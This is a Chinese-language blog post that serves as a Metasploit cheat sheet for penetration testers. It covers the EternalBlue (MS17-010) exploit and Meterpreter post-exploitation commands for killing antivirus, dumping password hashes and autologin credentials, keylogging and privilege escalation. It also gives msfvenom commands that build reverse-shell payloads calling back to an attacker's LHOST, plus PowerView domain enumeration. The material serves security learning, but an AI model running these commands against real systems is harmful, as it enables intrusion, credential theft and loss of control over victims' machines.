Metasploit Framework(MSF)

于 2023-06-19 16:37:54 发布
阅读量145 收藏
点赞数
分类专栏: 工具使用 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61899124/article/details/131290013
版权

目录

简介

基础使用

模块简介

Auxiliaries (辅助模块)

Exploit (漏洞利用模块)

Payload (攻击载荷模块)

Post (后期渗透模块)

Encoders (编码工具模块)

后渗透阶段

Meterpreter的命令用法

Post 后渗透模块

键盘记录

屏幕截图

权限提升

上传/下载文件

常用扩展库

msfvenom生成shell的命令

导入并执行PowerShell脚本

简介

是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。

基础使用

进入框架

msfconsole

使用search命令查找相关漏洞

search  ms17_010

使用use进入模块

use exploit/windows/smb/ms17_010_eternalblue

使用info查看模块信息

info

设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

查看模块需要配置的参数

show options

设置参数

set  RHOST  192.168.100.158

攻击

exploit / run

模块简介

Auxiliaries (辅助模块)

​包含了一些辅助功能的模块,如扫描、信息收集等。

Exploit (漏洞利用模块)

​包含了各种用于利用特定漏洞的模块,例如针对不同操作系统和应用程序的漏洞利用代码。

Payload (攻击载荷模块)

​提供用于在目标系统上执行操作的有效载荷代码,例如反向Shell、远程控制等。

Post (后期渗透模块)

​使用资源模块执行各种后渗透操作,如信息收集、数据盗取、持久化等。

Encoders (编码工具模块)

在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来。

后渗透阶段

Meterpreter的命令用法

background 把当前会话挂到后台运行

exit 终止 Meterpreter 会话

shell 放入系统命令 shell

sessions -l 查看获得的meterpreter_shell会话列表

sessions -i 1 进入相应的meterpreter_shell中

Post 后渗透模块

获取目标分区情况

run post/windows/gather/forensics/enum_drives

自动进程迁移

run post/windows/manage/migrate

查看目标主机是否运行在虚拟机上

run post/windows/gather/checkvm

关闭杀毒软件

run post/windows/manage/killav

开启远程桌面服务

run post/windows/manage/enable_rdp

查看路由信息

run post/windows/manage/autoroute

列举当前登录的用户

run post/windows/gather/enum_logged_on_users

列举应用程序

run post/windows/gather/enum_applications

抓取自动登录的用户名和密码

run post/windows/gather/credentials/windows_autologin

dump出所有用户的hash

run post/windows/gather/smart_hashdump

收集系统环境信息

run post/multi/gather/env

查看开启的服务

run post/windows/gather/enum_services

查看目标主机最近的操作

run post/windows/gather/dumplinks

删除用户

run post/wndows/manage/delete_user username=aiyou

添加用户

run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou

查看目标机安装了哪些应用、补丁

run post/windows/gather/enum_applications

对目标进行漏洞扫描

run post/multi/recon/local_exploit_suggester

键盘记录

keyscan_start: #开启键盘记录功能,开关键盘记录功能后目标输入的内容我们就通过keyscan_dump命令在Meterpreter里面进行查看;

keyscan_dump: #显示捕捉到的键盘记录信息

keyscan_stop: #停止键盘记录功能

屏幕截图

screenshot

权限提升

getuid

#命令可以获取当前用户的信息,可以看到,当我们使用 getsystem进行提权后,用户身材为 NT AUTHORITY\SYSTEM ,这个也就是Windows的系统权限。

getsystem

#自动提权为系统权限

上传/下载文件

上传

upload file

下载

download file

常用扩展库

load/use

load/use #加载模块

load -l #列出所有可用的扩展

load -help #帮助;说明

msfvenom生成shell的命令

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.38.132 LPORT=9999 -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

导入并执行PowerShell脚本

加载powershell功能

load powershell

导入powershell脚本,提前将该powershell脚本放到指定目录

powershell_import /root/PowerView.ps1

执行该脚本下的功能模块Get-domain,该模块用于获取域信息,一个脚本下通常有多个功能模块;获取当前用户所在域的名称;

powershell_execute Get-NetDomain

该功能模块用于定位域管理员登录的主机

powershell_execute Invoke-UserHunter

该模块用于定位域信息

powershell_execute Get-NetForest

枚举域中所有计算机上本地管理员组的成员

powershell_execute Invoke-EnumerateLocalAdmin

仙322
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit Framework(MSF)的使用
谢公子的博客
03-01 2万+
目录 Metasploit Metasploit的安装和升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010(永恒之蓝) Auxiliary辅助探测模块 Exploit漏洞利用模块 Payload攻击载荷模块 后渗透阶段 Post后渗透模块 查看主机是否运行在虚拟机上 关闭杀毒...
Metasploit FrameworkMSF)基础框架
weixin_51151498的博客
02-12 3216
MSF使用
MSF&Powershell进行钓鱼攻击
weixin_44508748的博客
04-26 2352
一、Powershell配合MSF无文件攻击 实验环境: 靶机:win 7 >192.168.1.9 攻击机:kali>192.168.1.7 web服务器:win 10 > 192.168.1.6 本次实验的大致过程如下: MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击...
MSF&Powershell钓鱼攻击
最新发布
p01son的博客
06-02 280
Powershell是windows下面非常强大的命令行工具,Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。
metasploit-framework-6.0.27
01-29
漏洞利用框架,Windows版本
Metasploit framework
qq_49091880的博客
01-27 558
工具:the Metasploit framework 1.启动命令:msfconsole 一些参数解释: (1)exploit:是代表利用漏洞进行攻击动作的模块 (2)auciliary:负责执行信息收集、扫描、嗅探 (3)post:后渗透模块 2.搜索命令 (1)例如:search ms17-010(搜索ms17-010漏洞模块) 查看是否存在这个漏洞 命令:set rhosts 目标主机IP地址 3.以ms17-010的第三个模块为例(永恒之蓝) 命令:use 3(利用永恒之蓝模块) 命令:info(
Metasploit Framework
jstang的博客
09-06 3838
待解决的问题 发现的漏洞和解决的漏洞,系统安全性有怎样的提高? 这些漏洞具体什么原因、哪种协议和版本,存在什么样的漏洞,怎么利于和修复,对系统的影响。 渗透测试者的困扰 需要掌握数百个工具软件,上千个命令参数,实在记不住 新出现的漏洞PoC/EXP有不同的运行环境要求,准备工作繁琐 大部分时间都在学习不同工具的使用习惯,如果能统一就好了。 Metasploit能解决以上困扰吗?(一定程度) Metasploit简介 目前最流行、最强大、最具扩展性的渗透测试平台软件。 基于Metasploit进行渗透测试
rapid7/metasploit-framework
08-20 281
Metasploit Build Status Maintainability Test Coverage Docker Pulls The Metasploit Framework is released under a BSD-style license. See COPYING for more details. The latest version of this software is available from: https://metasploit.com Bug tracking and
Metasploit Framework —— Basic
KAKA的博客
07-09 237
这里介绍的就是 MSF 的一些简单的基本使用,创始人 HD 摩尔曾说谁为 MS 写教程其实就是自作自受,纯属找虐,因为真的变化太快了,所以这里所写使一些基本功能,其余的需要自己去摸索… !!! 但虽然这样,还是有人写,目前被作者称赞过的最好的一本教材就是《Metasploitable 渗透测试指南》 !!! 由 offensive security 即 kali 官方所做,国内译本是清华博士诸葛建伟带队翻译而成的 !!! Metasploit Framework --> MSF --> 渗透测试
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
metasploitframework-latest.pkg
01-14
metasploitframework-latest.pkg官网地址下载超级慢,大小196M,适用于MAC版本的MSF网络攻防软件,官网地址:
metasploit-framework工具
10-09
MSF漏洞测试工具 使用方法: 根据漏洞名称搜索 : search ms17_010 设置模块:use auxiliary/scanner/smb/smb_ms17_010 设置目标地址:set rhosts x.x.x.x 设置好了之后,run或者exploit 进行攻击
node-msfrpc:Metasploit Framework RPC API和命令行界面
05-10
适用于Node.js的Metasploit RPC API入门正在安装这将在您的系统中安装cli。 npm install -g msfrpc 这会将msfrpc模块添加到您的Node.js项目中。 npm install --save msfrpc使用cli msfrpc < URI> URI示例: ...
metasploit_in_termux:在Termux中安装Metasploit Framework 6
05-02
Termux中的Metasploit Framework 6 如何: 汽车 source <( curl -fsSL https://kutt.it/msf ) 手动的 pkg install wget wget ...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4298
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
【渗透测试框架】Metasploit-Framework(MSF)安装与使用
做自己喜欢的事,并将其发挥到极致!
05-23 6934
文章目录前言一、Metasploit简介二、Metasploit安装及更新一键安装更新Metasploit三、Metasploit数据库连接四、Metasploit模块介绍Exploit模块Payload模块常见的几种 Stagers PayloadMeterpreter五、Metasploit实战攻击六、后渗透攻击阶段后渗透常用命令POST后渗透常用模块生成持续性后门程序Metasploit Socks代理PowerShell脚本(域内信息收集)加载stdapi升级会话SessionMeterpreter
渗透测试工具之Metasploit FrameworkMSF
weixin_50904074的博客
03-15 1736
Metasploit是当前信息安全与渗透测试领域最流行的术语,它的出现颠覆了以往的已有的渗透测试的方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些流行的系统上的操作基本上都是一样的。Metasploit 框架(Metasploit FrameworkMSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。
渗透测试神器——Metasploit Framerwork使用
PICACHU+++的博客
02-19 4021
一、介绍 Metasploit Framework是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 二、基本使用 1.信息收集 db_nmap /nmap -T [0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms -sS:TCP SYN扫描,半开扫描 -sA:TCP ACK扫描 -sT:TCP扫描
termux安装msf
05-14
要在Termux上安装Metasploit FrameworkMSF),请按照以下步骤操作: 1. 打开Termux并更新软件包列表: ``` pkg update && pkg upgrade ``` 2. 安装必要的依赖项和工具: ``` pkg install curl wget git gnupg2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值